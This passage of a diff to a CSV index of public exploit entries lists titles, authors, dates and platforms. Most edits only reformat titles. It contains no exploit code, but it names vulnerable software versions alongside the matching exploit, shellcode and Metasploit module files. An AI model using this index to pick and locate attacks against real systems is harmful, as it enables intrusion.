144525.5 NULL Pointer Dereference Denial Of Service",2011-06-28,"Luigi Auriemma",windows,dos,0 +35895,platforms/windows/dos/35895.txt,"RealityServer Web Services RTMP Server 3.1.1 build 144525.5 - NULL Pointer Dereference Denial Of Service",2011-06-28,"Luigi Auriemma",windows,dos,0 35896,platforms/php/webapps/35896.txt,"FlatPress 0.1010.1 - Multiple Cross-Site Scripting Vulnerabilities",2011-06-28,"High-Tech Bridge SA",php,webapps,0 35897,platforms/windows/remote/35897.html,"CygniCon CyViewer - ActiveX Control 'SaveData()' Insecure Method",2011-06-28,"High-Tech Bridge SA",windows,remote,0 35898,platforms/multiple/remote/35898.php,"Atlassian JIRA 3.13.5 - File Download Security Bypass",2011-06-28,"Ignacio Garrido",multiple,remote,0 @@ -32390,7 +32385,7 @@ id,file,description,date,author,platform,type,port 35922,platforms/php/webapps/35922.txt,"Joomla! 'com_jr_tfb' Component - 'controller' Parameter Local File Inclusion",2011-07-05,FL0RiX,php,webapps,0 35923,platforms/asp/webapps/35923.txt,"Paliz Portal - Cross-Site Scripting / Multiple SQL Injection",2011-07-02,Net.Edit0r,asp,webapps,0 35924,platforms/windows/remote/35924.py,"ClearSCADA - Remote Authentication Bypass Exploit",2015-01-28,"Jeremy Brown",windows,remote,0 -35925,platforms/hardware/remote/35925.txt,"Portech MV-372 VoIP Gateway Multiple Security Vulnerabilities",2011-07-05,"Zsolt Imre",hardware,remote,0 +35925,platforms/hardware/remote/35925.txt,"Portech MV-372 VoIP Gateway - Multiple Security Vulnerabilities",2011-07-05,"Zsolt Imre",hardware,remote,0 35926,platforms/asp/webapps/35926.txt,"eTAWASOL - 'id' Parameter SQL Injection",2011-07-03,Bl4ck.Viper,asp,webapps,0 35927,platforms/php/webapps/35927.txt,"Classified Script - c-BrowseClassified URL Cross-Site Scripting",2011-07-05,"Raghavendra Karthik D",php,webapps,0 35928,platforms/windows/remote/35928.html,"Pro Softnet IDrive Online Backup 3.4.0 - ActiveX SaveToFile() Arbitrary File Overwrite",2011-07-06,"High-Tech Bridge SA",windows,remote,0 @@ -32451,7 +32446,7 @@ id,file,description,date,author,platform,type,port 36004,platforms/multiple/remote/36004.txt,"Skype 5.3 - 'Mobile Phone' Field HTML Injection",2011-08-01,noptrix,multiple,remote,0 36005,platforms/php/webapps/36005.txt,"MyBB MyTabs Plugin - 'tab' Parameter SQL Injection",2011-08-02,"AutoRUN and dR.sqL",php,webapps,0 36006,platforms/multiple/remote/36006.java,"Open Handset Alliance Android 2.3.4/3.1 - Browser Sandbox Security Bypass",2011-08-02,"Roee Hay",multiple,remote,0 -36007,platforms/multiple/dos/36007.txt,"AzeoTech DAQFactory Denial of Service",2011-06-24,"Knud Erik Hojgaard",multiple,dos,0 +36007,platforms/multiple/dos/36007.txt,"AzeoTech DAQFactory - Denial of Service",2011-06-24,"Knud Erik Hojgaard",multiple,dos,0 36008,platforms/php/webapps/36008.txt,"Gilnet News - 'read_more.php' SQL Injection",2011-07-11,Err0R,php,webapps,0 36009,platforms/php/webapps/36009.txt,"mt LinkDatenbank - 'b' Parameter Cross-Site Scripting",2011-08-03,Err0R,php,webapps,0 36010,platforms/asp/webapps/36010.txt,"BESNI OKUL PORTAL - 'sayfa.asp' Cross-Site Scripting",2011-08-03,Err0R,asp,webapps,0 @@ -32464,7 +32459,7 @@ id,file,description,date,author,platform,type,port 36017,platforms/php/webapps/36017.txt,"HESK 2.2 - Multiple Cross-Site Scripting Vulnerabilities",2011-08-03,"High-Tech Bridge SA",php,webapps,0 36018,platforms/php/webapps/36018.txt,"WordPress WP e-Commerce Plugin 3.8.6 - 'cart_messages[]' Parameter Cross-Site Scripting",2011-08-04,"High-Tech Bridge SA",php,webapps,0 36019,platforms/asp/webapps/36019.txt,"Community Server 2007/2008 - 'TagSelector.aspx' Cross-Site Scripting",2011-08-04,PontoSec,asp,webapps,0 -36020,platforms/windows/remote/36020.txt,"Microsoft Visual Studio Report Viewer 2005 Control Multiple Cross-Site Scripting Vulnerabilities",2011-08-09,"Adam Bixby",windows,remote,0 +36020,platforms/windows/remote/36020.txt,"Microsoft Visual Studio Report Viewer 2005 Control - Multiple Cross-Site Scripting Vulnerabilities",2011-08-09,"Adam Bixby",windows,remote,0 36041,platforms/php/webapps/36041.txt,"Fork CMS 3.8.5 - SQL Injection",2015-02-09,"Sven Schleier",php,webapps,80 36022,platforms/windows/dos/36022.py,"MooPlayer 1.3.0 - 'm3u' SEH Buffer Overflow PoC (1)",2015-02-09,"Samandeep Singh",windows,dos,0 36023,platforms/php/webapps/36023.txt,"Redaxscript CMS 2.2.0 - SQL Injection",2015-02-09,"ITAS Team",php,webapps,0 @@ -32513,7 +32508,7 @@ id,file,description,date,author,platform,type,port 36072,platforms/php/webapps/36072.txt,"OneFileCMS 1.1.1 - 'onefilecms.php' Cross-Site Scripting",2011-08-21,mr.pr0n,php,webapps,0 36073,platforms/php/webapps/36073.txt,"Pandora FMS 3.x - 'index.php' Cross-Site Scripting",2011-08-22,"mehdi boukazoula",php,webapps,0 36074,platforms/php/webapps/36074.txt,"TotalShopUK 1.7.2 - 'index.php' SQL Injection",2011-08-22,"Eyup CELIK",php,webapps,0 -36075,platforms/windows/remote/36075.py,"Freefloat FTP Server 'ALLO' Command Remote Buffer Overflow",2011-08-20,Black.Spook,windows,remote,0 +36075,platforms/windows/remote/36075.py,"Freefloat FTP Server - 'ALLO' Command Remote Buffer Overflow",2011-08-20,Black.Spook,windows,remote,0 36076,platforms/php/webapps/36076.txt,"Concrete 5.4.1 1 - 'rcID' Parameter Cross-Site Scripting",2011-08-22,"Aung Khant",php,webapps,0 36077,platforms/php/webapps/36077.txt,"Open Classifieds 1.7.2 - Multiple Cross-Site Scripting Vulnerabilities",2011-08-23,"Yassin Aboukir",php,webapps,0 36078,platforms/windows/remote/36078.py,"PCMan FTP Server 2.0.7 - Buffer Overflow MKD Command",2015-02-14,R-73eN,windows,remote,0 @@ -32597,7 +32592,7 @@ id,file,description,date,author,platform,type,port 36160,platforms/php/webapps/36160.txt,"phpBugTracker 1.6.0 - Multiple Vulnerabilities",2015-02-23,"Steffen Rösemann",php,webapps,80 36161,platforms/php/webapps/36161.txt,"WordPress Easy Social Icons Plugin 1.2.2 - CSRF",2015-02-23,"Eric Flokstra",php,webapps,80 36162,platforms/php/webapps/36162.txt,"TWiki 5.0.2 - bin/view/Main/Jump newtopic Parameter XSS",2011-09-22,"Mesut Timur",php,webapps,0 -36163,platforms/php/webapps/36163.txt,"TWiki 5.0.2 SlideShowPlugin Slide Show Pages URI XSS",2011-09-22,"Mesut Timur",php,webapps,0 +36163,platforms/php/webapps/36163.txt,"TWiki 5.0.2 SlideShowPlugin - Slide Show Pages URI XSS",2011-09-22,"Mesut Timur",php,webapps,0 36164,platforms/php/webapps/36164.txt,"AWStats 6.95/7.0 - 'awredir.pl' Multiple Cross-Site Scripting Vulnerabilities",2011-09-22,MustLive,php,webapps,0 36165,platforms/php/webapps/36165.txt,"IceWarp Mail Server 10.3.2 server/webmail.php Soap Message Parsing - Remote Arbitrary File Disclosure",2011-09-24,"David Kirkpatrick",php,webapps,0 36166,platforms/php/webapps/36166.txt,"BuddyPress 1.2.10 / WordPress 3.1.x / DEV Blogs Mu 1.2.6 Regular Subscriber - HTML Injection",2011-09-26,knull,php,webapps,0 @@ -32631,20 +32626,20 @@ id,file,description,date,author,platform,type,port 36195,platforms/php/webapps/36195.txt,"WordPress Trending 0.1 Theme - 'cpage' Parameter Cross-Site Scripting",2011-09-24,SiteWatch,php,webapps,0 36196,platforms/php/webapps/36196.txt,"SonicWall Viewpoint 6.0 - 'scheduleID' Parameter SQL Injection",2011-10-02,Rem0ve,php,webapps,0 36197,platforms/php/webapps/36197.txt,"ezCourses - admin.asp Security Bypass",2011-10-01,J.O,php,webapps,0 -36198,platforms/multiple/dos/36198.pl,"Polipo 1.0.4.1 POST/PUT Requests HTTP Header Processing Denial Of Service",2011-10-01,"Usman Saeed",multiple,dos,0 +36198,platforms/multiple/dos/36198.pl,"Polipo 1.0.4.1 - POST/PUT Requests HTTP Header Processing Denial Of Service",2011-10-01,"Usman Saeed",multiple,dos,0 36199,platforms/linux/remote/36199.txt,"Perl 5.x - Digest Module 'Digest->new()' Code Injection",2011-10-02,anonymous,linux,remote,0 36200,platforms/php/webapps/36200.txt,"Netvolution 2.5.8 - 'referer' Header SQL Injection",2011-10-03,"Patroklos Argyroudis",php,webapps,0 36201,platforms/php/webapps/36201.txt,"Phorum 5.2.18 - 'admin/index.php' Cross-Site Scripting",2011-10-03,"Stefan Schurtz",php,webapps,0 36202,platforms/hardware/webapps/36202.py,"Seagate Business NAS 2014.00319 - Pre-Authentication Remote Code Execution (0Day)",2015-03-01,"OJ Reeves",hardware,webapps,80 36203,platforms/php/webapps/36203.txt,"vtiger CRM 5.2.1 - index.php Multiple Parameter XSS",2011-10-04,"Aung Khant",php,webapps,0 36204,platforms/php/webapps/36204.txt,"vtiger CRM 5.2.1 - phprint.php Multiple Parameter XSS",2011-10-04,"Aung Khant",php,webapps,0 -36205,platforms/hardware/remote/36205.txt,"SonicWALL SessId Cookie Brute-force Weakness Admin Session Hijacking",2011-10-04,"Hugo Vazquez",hardware,remote,0 +36205,platforms/hardware/remote/36205.txt,"SonicWALL - SessId Cookie Brute-force Weakness Admin Session Hijacking",2011-10-04,"Hugo Vazquez",hardware,remote,0 36206,platforms/windows/remote/36206.rb,"Persistent Systems Client Automation - Command Injection RCE (Metasploit)",2015-02-27,"Ben Turner",windows,remote,3465 36207,platforms/windows/local/36207.py,"Microsoft Office Word 2007 - RTF Object Confusion (ASLR + DEP Bypass)",2015-02-28,R-73eN,windows,local,0 36208,platforms/php/webapps/36208.txt,"vtiger CRM 5.2 - 'onlyforuser' Parameter SQL Injection",2011-10-15,"Aung Khant",php,webapps,0 36209,platforms/windows/remote/36209.html,"Microsoft Internet Explorer 8 - Select Element Memory Corruption",2011-10-11,"Ivan Fratric",windows,remote,0 36262,platforms/windows/webapps/36262.txt,"Solarwinds Orion Service - SQL Injection",2015-03-04,"Brandon Perry",windows,webapps,0 -36263,platforms/linux/remote/36263.rb,"Symantec Web Gateway 5 - restore.php Post Authentication Command Injection",2015-03-04,Metasploit,linux,remote,443 +36263,platforms/linux/remote/36263.rb,"Symantec Web Gateway 5 - restore.php Post-Authentication Command Injection",2015-03-04,Metasploit,linux,remote,443 36211,platforms/windows/dos/36211.txt,"Microsoft Host Integration Server 2004-2010 - Remote Denial Of Service",2011-04-11,"Luigi Auriemma",windows,dos,0 36244,platforms/php/webapps/36244.txt,"Boonex Dolphin 6.1 - 'xml/get_list.php' SQL Injection",2011-10-19,"Yuri Goltsev",php,webapps,0 36245,platforms/php/webapps/36245.txt,"Innovate Portal 2.0 - 'cat' Parameter Cross-Site Scripting",2011-10-20,"Eyup CELIK",php,webapps,0 @@ -32693,7 +32688,7 @@ id,file,description,date,author,platform,type,port 36257,platforms/linux/local/36257.txt,"Trendmicro IWSS 3.1 - Local Privilege Escalation",2011-10-26,"Buguroo Offensive Security",linux,local,0 36258,platforms/windows/remote/36258.txt,"XAMPP 1.7.4 - Multiple Cross-Site Scripting Vulnerabilities",2011-10-26,Sangteamtham,windows,remote,0 36259,platforms/php/webapps/36259.txt,"eFront 3.6.10 - 'professor.php' Script Multiple SQL Injection",2011-10-28,"Vulnerability Research Laboratory",php,webapps,0 -36260,platforms/windows/dos/36260.txt,"Opera Web Browser 11.52 Escape Sequence Stack Buffer Overflow Denial of Service",2011-10-28,"Marcel Bernhardt",windows,dos,0 +36260,platforms/windows/dos/36260.txt,"Opera Web Browser 11.52 - Escape Sequence Stack Buffer Overflow Denial of Service",2011-10-28,"Marcel Bernhardt",windows,dos,0 36264,platforms/php/remote/36264.rb,"Seagate Business NAS - Unauthenticated Remote Command Execution",2015-03-04,Metasploit,php,remote,80 36265,platforms/php/webapps/36265.txt,"BEdita CMS 3.5.0 - Multiple Vulnerabilities",2015-03-04,"Edric Teo",php,webapps,80 36266,platforms/lin_x86-64/dos/36266.c,"Linux Kernel 3.17.5 - IRET Instruction #SS Fault Handling Crash PoC",2015-03-04,"Emeric Nasi",lin_x86-64,dos,0 @@ -32740,12 +32735,12 @@ id,file,description,date,author,platform,type,port 36308,platforms/php/webapps/36308.txt,"Webistry 1.6 - 'pid' Parameter SQL Injection",2011-11-16,CoBRa_21,php,webapps,0 36309,platforms/hardware/dos/36309.py,"Sagem F@st 3304-V2 - Telnet Crash PoC",2015-03-08,"Loudiyi Mohamed",hardware,dos,0 36310,platforms/lin_x86-64/local/36310.txt,"Rowhammer Linux Kernel - Privilege Escalation PoC",2015-03-09,"Google Security Research",lin_x86-64,local,0 -36311,platforms/lin_x86-64/local/36311.txt,"Rowhammer: NaCl Sandbox Escape PoC",2015-03-09,"Google Security Research",lin_x86-64,local,0 +36311,platforms/lin_x86-64/local/36311.txt,"Rowhammer - NaCl Sandbox Escape PoC",2015-03-09,"Google Security Research",lin_x86-64,local,0 36314,platforms/php/webapps/36314.txt,"webERP 4.3.8 - reportwriter/ReportMaker.php reportid Parameter SQL Injection",2011-11-17,"High-Tech Bridge SA",php,webapps,0 36315,platforms/php/webapps/36315.txt,"webERP 4.3.8 - reportwriter/FormMaker.php ReportID Parameter SQL Injection",2011-11-17,"High-Tech Bridge SA",php,webapps,0 36316,platforms/php/webapps/36316.txt,"ZOHO ManageEngine ADSelfService Plus 4.5 Build 4521 - Cross-Site Scripting",2011-11-17,"James webb",php,webapps,0 36317,platforms/php/webapps/36317.txt,"WordPress Flexible Custom Post Type plugin - 'id' Parameter Cross-Site Scripting",2011-11-17,Am!r,php,webapps,0 -36318,platforms/windows/remote/36318.txt,"Jetty Web Server Directory Traversal",2011-11-18,"Alexey Sintsov",windows,remote,0 +36318,platforms/windows/remote/36318.txt,"Jetty Web Server - Directory Traversal",2011-11-18,"Alexey Sintsov",windows,remote,0 36319,platforms/windows/remote/36319.txt,"GoAhead WebServer 2.5 - 'goform/formTest' Multiple Cross-Site Scripting Vulnerabilities",2011-11-18,"Prabhu S Angadi",windows,remote,0 36320,platforms/php/webapps/36320.txt,"Codoforum 2.5.1 - Arbitrary File Download",2015-03-10,"Kacper Szurek",php,webapps,80 36321,platforms/php/webapps/36321.txt,"GeniXCMS 0.0.1 - Multiple Vulnerabilities",2015-03-10,LiquidWorm,php,webapps,80 @@ -32803,10 +32798,10 @@ id,file,description,date,author,platform,type,port 36372,platforms/php/webapps/36372.txt,"WordPress Theme DesignFolio Plus 1.2 - Arbitrary File Upload",2015-03-04,CrashBandicot,php,webapps,0 36373,platforms/php/webapps/36373.txt,"Joomla Simple Photo Gallery 1.0 - Arbitrary File Upload",2015-03-10,CrashBandicot,php,webapps,0 36374,platforms/php/webapps/36374.txt,"WordPress Plugin Reflex Gallery 3.1.3 - Arbitrary File Upload",2015-03-08,CrashBandicot,php,webapps,0 -36375,platforms/asp/webapps/36375.txt,"Virtual Vertex Muster 6.1.6 Web Interface Directory Traversal",2011-11-29,"Nick Freeman",asp,webapps,0 -36376,platforms/windows/remote/36376.txt,"Oxide WebServer Directory Traversal",2011-11-29,demonalex,windows,remote,0 +36375,platforms/asp/webapps/36375.txt,"Virtual Vertex Muster 6.1.6 - Web Interface Directory Traversal",2011-11-29,"Nick Freeman",asp,webapps,0 +36376,platforms/windows/remote/36376.txt,"Oxide WebServer - Directory Traversal",2011-11-29,demonalex,windows,remote,0 36377,platforms/multiple/dos/36377.txt,"CoDeSys 3.4 - HTTP POST Request NULL Pointer Content-Length Parsing Remote DoS",2011-11-30,"Luigi Auriemma",multiple,dos,0 -36378,platforms/multiple/dos/36378.txt,"CoDeSys 3.4 NULL Pointer Invalid HTTP Request Parsing Remote DoS",2011-11-30,"Luigi Auriemma",multiple,dos,0 +36378,platforms/multiple/dos/36378.txt,"CoDeSys 3.4 - NULL Pointer Invalid HTTP Request Parsing Remote DoS",2011-11-30,"Luigi Auriemma",multiple,dos,0 36379,platforms/php/webapps/36379.txt,"OrangeHRM 2.6.11 - index.php Multiple Parameter XSS",2011-11-30,"High-Tech Bridge SA",php,webapps,0 36380,platforms/php/webapps/36380.txt,"OrangeHRM 2.6.11 - lib/controllers/CentralController.php URI XSS",2011-11-30,"High-Tech Bridge SA",php,webapps,0 36381,platforms/php/webapps/36381.txt,"OrangeHRM 2.6.11 - lib/controllers/CentralController.php id Parameter SQL Injection",2011-11-30,"High-Tech Bridge SA",php,webapps,0 @@ -32835,7 +32830,7 @@ id,file,description,date,author,platform,type,port 36401,platforms/php/webapps/36401.txt,"AtMail 1.04 - 'func' Parameter Multiple Cross-Site Scripting Vulnerabilities",2011-12-01,Dognædis,php,webapps,0 36402,platforms/asp/webapps/36402.txt,"Hero 3.69 - 'month' Parameter Cross-Site Scripting",2011-12-01,"Gjoko Krstic",asp,webapps,0 36403,platforms/windows/dos/36403.html,"HP Device Access Manager for HP ProtectTools 5.0/6.0 Heap Memory Corruption",2011-12-02,"High-Tech Bridge SA",windows,dos,0 -36404,platforms/linux/dos/36404.c,"GNU glibc Timezone Parsing Remote Integer Overflow",2009-06-01,dividead,linux,dos,0 +36404,platforms/linux/dos/36404.c,"GNU glibc - Timezone Parsing Remote Integer Overflow",2009-06-01,dividead,linux,dos,0 36414,platforms/php/webapps/36414.txt,"WordPress WPML 3.1.9 Plugin - Multiple Vulnerabilities",2015-03-16,"Jouko Pynnonen",php,webapps,80 36415,platforms/java/remote/36415.rb,"ElasticSearch - Search Groovy Sandbox Bypass",2015-03-16,Metasploit,java,remote,9200 36482,platforms/php/webapps/36482.txt,"Siena CMS 1.242 - 'err' Parameter Cross-Site Scripting",2012-01-01,Net.Edit0r,php,webapps,0 @@ -32849,15 +32844,15 @@ id,file,description,date,author,platform,type,port 36420,platforms/windows/remote/36420.rb,"Adobe Flash Player - PCRE Regex",2015-03-17,Metasploit,windows,remote,0 36421,platforms/linux/remote/36421.rb,"Exim GHOST - (glibc gethostbyname) Buffer Overflow (Metasploit)",2015-03-18,"Qualys Corporation",linux,remote,25 36783,platforms/windows/dos/36783.txt,"Oracle Hyperion Smart View for Office 11.1.2.3.000 - Crash PoC",2015-04-17,sajith,windows,dos,0 -36480,platforms/multiple/remote/36480.rb,"Firefox Proxy Prototype Privileged Javascript Injection",2015-03-24,Metasploit,multiple,remote,0 +36480,platforms/multiple/remote/36480.rb,"Firefox - Proxy Prototype Privileged Javascript Injection",2015-03-24,Metasploit,multiple,remote,0 36422,platforms/windows/dos/36422.txt,"Fortinet Single Sign On - Stack Overflow",2015-03-18,"Core Security",windows,dos,8000 -36423,platforms/java/webapps/36423.txt,"Websense Appliance Manager Command Injection",2015-03-18,"Han Sahin",java,webapps,9447 +36423,platforms/java/webapps/36423.txt,"Websense Appliance Manager - Command Injection",2015-03-18,"Han Sahin",java,webapps,9447 36424,platforms/windows/local/36424.txt,"Windows 8.1 - Local WebDAV NTLM Reflection Elevation of Privilege",2015-03-19,"Google Security Research",windows,local,0 36425,platforms/linux/dos/36425.txt,"Linux Kernel 2.6.35 - Network Namespace Remote Denial of Service",2011-12-06,"Serge Hallyn",linux,dos,0 36426,platforms/multiple/remote/36426.txt,"Apache Struts 2.0.9/2.1.8 - Session Tampering Security Bypass",2011-12-07,"Hisato Killing",multiple,remote,0 36427,platforms/windows/dos/36427.txt,"PowerDVD 11.0.0.2114 - Remote Denial of Service",2011-12-07,"Luigi Auriemma",windows,dos,0 -36428,platforms/hardware/remote/36428.txt,"Axis M10 Series Network Cameras Cross-Site Scripting",2011-12-07,"Matt Metzger",hardware,remote,0 -36429,platforms/hardware/remote/36429.txt,"HomeSeer HS2 2.5.0.20 Web Interface Log Viewer Page URI XSS",2011-12-08,"Silent Dream",hardware,remote,0 +36428,platforms/hardware/remote/36428.txt,"Axis M10 Series Network Cameras - Cross-Site Scripting",2011-12-07,"Matt Metzger",hardware,remote,0 +36429,platforms/hardware/remote/36429.txt,"HomeSeer HS2 2.5.0.20 - Web Interface Log Viewer Page URI XSS",2011-12-08,"Silent Dream",hardware,remote,0 36430,platforms/linux/local/36430.sh,"HP Application Lifestyle Management 11 - 'GetInstalledPackages' Local Privilege Escalation",2011-12-08,anonymous,linux,local,0 36431,platforms/windows/dos/36431.pl,"FastStone Image Viewer 5.3 - (.tga) Crash PoC",2015-03-19,"ITDefensor Vulnerability Research Team",windows,dos,0 36432,platforms/php/webapps/36432.txt,"Pet Listing - 'preview.php' Cross-Site Scripting",2011-12-09,Mr.PaPaRoSSe,php,webapps,0 @@ -32917,16 +32912,16 @@ id,file,description,date,author,platform,type,port 36494,platforms/php/webapps/36494.txt,"Limny 3.0.1 - 'login.php' Script Cross-Site Scripting",2012-01-04,"Gjoko Krstic",php,webapps,0 36495,platforms/php/webapps/36495.txt,"Pligg CMS 1.1.2 - 'status' Parameter SQL Injection",2011-12-29,SiteWatch,php,webapps,0 36496,platforms/php/webapps/36496.txt,"Pligg CMS 1.1.4 - 'SERVER[php_self]' Cross-Site Scripting",2011-12-29,SiteWatch,php,webapps,0 -36497,platforms/php/webapps/36497.txt,"UBB.threads 7.5.6 'Username' Field Cross-Site Scripting",2012-01-04,sonyy,php,webapps,0 +36497,platforms/php/webapps/36497.txt,"UBB.threads 7.5.6 - 'Username' Field Cross-Site Scripting",2012-01-04,sonyy,php,webapps,0 36498,platforms/php/webapps/36498.txt,"Yaws 1.88 - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities",2012-01-05,SiteWatch,php,webapps,0 36499,platforms/php/webapps/36499.txt,"StatIt 4 - 'statistik.php' Multiple Cross-Site Scripting Vulnerabilities",2012-01-04,sonyy,php,webapps,0 -36500,platforms/windows/remote/36500.txt,"HServer 0.1.1 Directory Traversal",2012-01-05,demonalex,windows,remote,0 +36500,platforms/windows/remote/36500.txt,"HServer 0.1.1 - Directory Traversal",2012-01-05,demonalex,windows,remote,0 36501,platforms/windows/local/36501.py,"Mini-stream Ripper 2.7.7.100 - Local Buffer Overflow",2015-03-26,"TUNISIAN CYBER",windows,local,0 36502,platforms/windows/local/36502.py,"RM Downloader 2.7.5.400 - Local Buffer Overflow",2015-03-26,"TUNISIAN CYBER",windows,local,0 36503,platforms/hardware/remote/36503.rb,"QNAP - Admin Shell via Bash Environment Variable Code Injection (Metasploit)",2015-03-26,"Patrick Pellegrino",hardware,remote,9993 36504,platforms/hardware/remote/36504.rb,"QNAP - Web Server Remote Code Execution via Bash Environment Variable Code Injection (Metasploit)",2015-03-26,"Patrick Pellegrino",hardware,remote,0 36505,platforms/windows/remote/36505.txt,"WebGate eDVR Manager - Stack Buffer Overflow",2015-03-26,"Praveen Darshanam",windows,remote,0 -36507,platforms/windows/remote/36507.txt,"Microsoft AntiXSS 3/4.0 Library Sanitization Module Security Bypass",2012-01-10,"Adi Cohen",windows,remote,0 +36507,platforms/windows/remote/36507.txt,"Microsoft AntiXSS 3/4.0 Library Sanitization Module - Security Bypass",2012-01-10,"Adi Cohen",windows,remote,0 36508,platforms/php/webapps/36508.txt,"VertrigoServ 2.25 - 'extensions.php' Script Cross-Site Scripting",2012-01-05,"Stefan Schurtz",php,webapps,0 36509,platforms/php/webapps/36509.txt,"SQLiteManager 1.2.4 - main.php dbsel Parameter XSS",2012-01-05,"Stefan Schurtz",php,webapps,0 36510,platforms/php/webapps/36510.txt,"SQLiteManager 1.2.4 - index.php Multiple Parameter XSS",2012-01-05,"Stefan Schurtz",php,webapps,0 @@ -33070,7 +33065,7 @@ id,file,description,date,author,platform,type,port 36655,platforms/php/webapps/36655.txt,"phpLDAPadmin 1.2.0.5-2 - 'server_id' Parameter Cross-Site Scripting",2012-02-01,andsarmiento,php,webapps,0 36656,platforms/php/webapps/36656.txt,"GForge 5.7.1 - Multiple Cross-Site Scripting Vulnerabilities",2012-02-02,sonyy,php,webapps,0 36657,platforms/php/webapps/36657.txt,"Joomla! 'com_bnf' Component - 'seccion_id' Parameter SQL Injection",2012-02-02,"Daniel Godoy",php,webapps,0 -36658,platforms/php/webapps/36658.txt,"iknSupport 'search' Module Cross-Site Scripting",2012-02-02,"Red Security TEAM",php,webapps,0 +36658,platforms/php/webapps/36658.txt,"iknSupport 'search' Module - Cross-Site Scripting",2012-02-02,"Red Security TEAM",php,webapps,0 36659,platforms/php/webapps/36659.txt,"Joomla! Currency Converter Component - 'from' Parameter Cross-Site Scripting",2012-02-02,"BHG Security Center",php,webapps,0 36660,platforms/php/webapps/36660.txt,"project-open 3.4.x - 'account-closed.tcl' Cross-Site Scripting",2012-02-03,"Michail Poultsakis",php,webapps,0 36661,platforms/php/webapps/36661.txt,"PHP-Fusion 7.2.4 - 'weblink_id' Parameter SQL Injection",2012-02-03,Am!r,php,webapps,0 @@ -33094,7 +33089,7 @@ id,file,description,date,author,platform,type,port 36679,platforms/windows/remote/36679.rb,"Solarwinds Firewall Security Manager 6.6.5 - Client Session Handling",2015-04-08,Metasploit,windows,remote,0 36680,platforms/hardware/remote/36680.txt,"Multiple Trendnet Camera Products - Remote Security Bypass",2012-02-10,console-cowboys,hardware,remote,0 36681,platforms/multiple/remote/36681.txt,"Apache MyFaces - 'ln' Parameter Information Disclosure",2012-02-09,"Paul Nicolucci",multiple,remote,0 -36682,platforms/php/dos/36682.php,"PHP PDORow Object Remote Denial Of Service",2011-09-24,anonymous,php,dos,0 +36682,platforms/php/dos/36682.php,"PHP PDORow Object - Remote Denial Of Service",2011-09-24,anonymous,php,dos,0 36683,platforms/php/webapps/36683.txt,"Dolibarr 3.x - 'adherents/fiche.php' SQL Injection",2012-02-10,"Benjamin Kunz Mejri",php,webapps,0 36684,platforms/java/webapps/36684.txt,"LxCenter Kloxo 6.1.10 - Multiple HTML Injection Vulnerabilities",2012-02-10,anonymous,java,webapps,0 36685,platforms/php/webapps/36685.txt,"CubeCart 3.0.20 - Multiple Script redir Parameter Arbitrary Site Redirect",2012-02-10,"Aung Khant",php,webapps,0 @@ -33102,7 +33097,7 @@ id,file,description,date,author,platform,type,port 36687,platforms/php/webapps/36687.txt,"CubeCart 3.0.20 - switch.php r Parameter Arbitrary Site Redirect",2012-02-10,"Aung Khant",php,webapps,0 36688,platforms/php/webapps/36688.html,"Zen Cart 1.3.9h - 'path_to_admin/product.php' Cross-Site Request Forgery",2012-02-10,DisK0nn3cT,php,webapps,0 36689,platforms/linux/webapps/36689.txt,"BOA Web Server 0.94.8.2 - Arbitrary File Access",2000-12-19,llmora,linux,webapps,0 -36690,platforms/linux/remote/36690.rb,"Barracuda Firmware 5.0.0.012 - Post Auth Remote Root exploit (Metasploit)",2015-04-09,xort,linux,remote,8000 +36690,platforms/linux/remote/36690.rb,"Barracuda Firmware 5.0.0.012 - Post-Auth Remote Root exploit (Metasploit)",2015-04-09,xort,linux,remote,8000 36691,platforms/php/webapps/36691.txt,"WordPress Windows Desktop and iPhone Photo Uploader Plugin - Arbitrary File Upload",2015-04-09,"Manish Tanwar",php,webapps,80 36692,platforms/osx/local/36692.py,"Mac OS X < 10.7.5/10.8.2/10.9.5/10.10.2 - 'Rootpipe' Privilege Escalation",2015-04-09,"Emil Kvarnhammar",osx,local,0 36693,platforms/php/webapps/36693.txt,"RabbitWiki - 'title' Parameter Cross-Site Scripting",2012-02-10,sonyy,php,webapps,0 @@ -33161,7 +33156,7 @@ id,file,description,date,author,platform,type,port 36751,platforms/php/webapps/36751.txt,"WordPress Video Gallery 2.8 Plugin - SQL Injection",2015-04-14,"Claudio Viviani",php,webapps,80 36750,platforms/lin_x86/shellcode/36750.c,"Linux/x86 - setreuid(0_ 0) + execve(_/sbin/halt_) + exit(0) shellcode (49 bytes)",2015-04-14,"Febriyanto Nugroho",lin_x86,shellcode,0 36755,platforms/php/webapps/36755.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - base_user.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 -36756,platforms/windows/remote/36756.html,"Samsung iPOLiS ReadConfigValue Remote Code Execution",2015-04-14,"Praveen Darshanam",windows,remote,0 +36756,platforms/windows/remote/36756.html,"Samsung iPOLiS - ReadConfigValue Remote Code Execution",2015-04-14,"Praveen Darshanam",windows,remote,0 36757,platforms/php/webapps/36757.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - index.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 36758,platforms/php/webapps/36758.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - admin/base_useradmin.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 36759,platforms/php/webapps/36759.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - admin/index.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 @@ -33213,7 +33208,7 @@ id,file,description,date,author,platform,type,port 36810,platforms/php/remote/36810.rb,"WordPress N-Media Website Contact Form Plugin - Upload Exploit",2015-04-21,Metasploit,php,remote,80 36811,platforms/php/remote/36811.rb,"WordPress Creative Contact Form Plugin - Upload Exploit",2015-04-21,Metasploit,php,remote,80 36812,platforms/php/remote/36812.rb,"WordPress Work The Flow Plugin - Upload Exploit",2015-04-21,Metasploit,php,remote,80 -36813,platforms/hardware/local/36813.txt,"ADB Backup Archive Path Traversal File Overwrite",2015-04-21,"Imre Rad",hardware,local,0 +36813,platforms/hardware/local/36813.txt,"ADB - Backup Archive Path Traversal File Overwrite",2015-04-21,"Imre Rad",hardware,local,0 36814,platforms/osx/dos/36814.c,"Mac OS X - Local Denial of Service",2015-04-21,"Maxime Villard",osx,dos,0 36815,platforms/cfm/webapps/36815.txt,"BlueDragon CFChart Servlet 7.1.1.17759 - Arbitrary File Retrieval/Deletion",2015-04-21,Portcullis,cfm,webapps,80 36848,platforms/php/webapps/36848.txt,"Tiki Wiki CMS Groupware - 